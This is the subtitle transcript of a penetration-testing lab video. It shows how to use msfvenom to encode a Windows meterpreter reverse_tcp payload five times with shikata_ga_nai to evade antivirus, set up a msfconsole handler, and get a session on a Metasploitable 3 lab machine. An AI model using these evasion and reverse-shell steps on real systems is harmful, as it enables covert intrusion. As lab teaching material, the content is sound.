1
00:00:00,650 --> 00:00:04,820
So I showed you earlier in the fourth section about encoders.

2
00:00:05,750 --> 00:00:15,350
msfvenom uses these encoders to keep you hidden from antivirus software. Encoders alter the code in

3
00:00:15,350 --> 00:00:18,800
an executable so that it looks different to antiviruses.

4
00:00:20,000 --> 00:00:28,460
They encode the original executable in a new binary so that when the executable is run, the original

5
00:00:28,460 --> 00:00:31,460
code is decoded into memory and executed.

6
00:00:33,120 --> 00:00:36,300
Now, different encoders are used for different platforms.

7
00:00:37,630 --> 00:00:42,650
msfvenom also has an option to iterate the encoding process.

8
00:00:43,420 --> 00:00:46,600
So what I mean by that is it allows for multi-encoding.

9
00:00:47,440 --> 00:00:48,610
I'll show you by example.

10
00:00:50,140 --> 00:00:58,360
So to create an encoded payload, you're going to need to specify with the -e parameter, and then to iterate

11
00:00:58,360 --> 00:01:02,600
the encoding several times, use the -i parameter.

12
00:01:03,460 --> 00:01:05,410
So it is very easy to use a payload.

13
00:01:06,380 --> 00:01:12,110
Now, the only thing that I want you to know is the encoder name and if it's suitable for your needs,

14
00:01:12,650 --> 00:01:17,030
so let's generate a file that contains an encoded payload.

15
00:01:17,920 --> 00:01:21,220
msfvenom -p windows.

16
00:01:22,620 --> 00:01:23,550
Meterpreter.

17
00:01:25,380 --> 00:01:26,940
Reverse TCP.

18
00:01:28,490 --> 00:01:37,640
LHOST equals 10.10.2.11 and LPORT equals 4442.

19
00:01:38,570 --> 00:01:40,070
And the platform is Windows.

20
00:01:42,360 --> 00:01:44,280
Architecture is 32-bit.

21
00:01:45,910 --> 00:01:47,740
File type is a Windows executable.

22
00:01:49,450 --> 00:01:55,990
And then -e is the encoder name, x86 forward slash.

23
00:01:56,850 --> 00:02:09,390
shikata_ga_nai, and -i 5 to iterate the encoding five times.

24
00:02:10,690 --> 00:02:13,530
And then let's give a name to the output file.

25
00:02:15,110 --> 00:02:20,870
So here we're going to need to be careful that we use a suitable encoder for the other parameters,

26
00:02:20,870 --> 00:02:22,640
such as architecture.

27
00:02:23,480 --> 00:02:23,900
All right.

28
00:02:23,900 --> 00:02:28,250
So now that file is created and saved. ls.

29
00:02:29,700 --> 00:02:36,030
And look, there it is. The file is a 32-bit Windows executable.

30
00:02:37,700 --> 00:02:45,320
So now we're going to need a handler, so open msfconsole, and I'm already using the handler template,

31
00:02:46,070 --> 00:02:47,870
so let's see some options.

32
00:02:49,400 --> 00:02:51,500
All right, so now I'm going to need to change everything.

33
00:02:52,490 --> 00:03:04,370
So set payload to windows meterpreter reverse_tcp, set LHOST to 10.10.2.11, set LPORT

34
00:03:04,370 --> 00:03:08,660
to 4442, and I think to set.

35
00:03:09,660 --> 00:03:15,780
Show the options again, and everything looks fine. Now, exploit -j.

36
00:03:17,790 --> 00:03:19,500
The pythons, however, are still running.

37
00:03:20,740 --> 00:03:22,750
So open Metasploitable 3.

38
00:03:24,030 --> 00:03:25,530
And refresh the page.

39
00:03:27,840 --> 00:03:32,100
Download and save and go to domestic file to the desktop.

40
00:03:34,390 --> 00:03:38,650
Now, let's open the msfconsole to observe this session.

41
00:03:41,410 --> 00:03:45,880
And now let's run the encoded EXE by double-clicking.

42
00:03:48,950 --> 00:03:55,400
And if you look over on to the left pane, you can see that the session has opened. Sessions.

43
00:03:56,710 --> 00:04:03,010
All right, so you got the session on port 4442, so now you can interact with session

44
00:04:03,010 --> 00:04:03,460
2.

45
00:04:04,930 --> 00:04:05,920
getuid.

46
00:04:07,320 --> 00:04:08,100
sysinfo.

47
00:04:10,540 --> 00:04:12,760
And this is definitely Metasploitable 3.